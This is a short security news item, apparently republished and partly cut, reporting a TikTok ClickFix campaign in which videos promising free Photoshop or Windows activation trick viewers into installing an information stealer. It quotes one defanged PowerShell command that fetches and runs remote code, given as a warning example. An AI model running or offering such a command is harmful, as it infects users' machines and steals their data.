A sophisticated scam targeting TikTok users is exploiting the platform’s reach to steal personal data by promising free access to expensive software like Adobe Photoshop. Cybercriminals are using a social engineering technique called ClickFix to trick victims into executing malicious commands that install information-stealing malware on their systems.
The scam operates through TikTok videos that demonstrate seemingly simple technical tricks to activate premium software, including Adobe Photoshop, Microsoft Windows, Discord Nitro, and other popular applications. These videos instruct users to run specific PowerShell commands on their Windows devices, with instructions that appear to be legitimate software activation methods. One example command involves executing iex (irm slmgr[.]win/photoshop), which fetches and runs malicious code from remote servers.
ClickFix attacks differ significantly from traditional phishing campaigns by guiding users through the process of infecting their own devices rather than simply tricking them into clicking malicious links. This social engineering approach exploits users’ familiarity with solving minor technical issues, CAPTCHA checks, and human verification processes, making the scam appear more legitimate. Microsoft research in
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
Read the original article: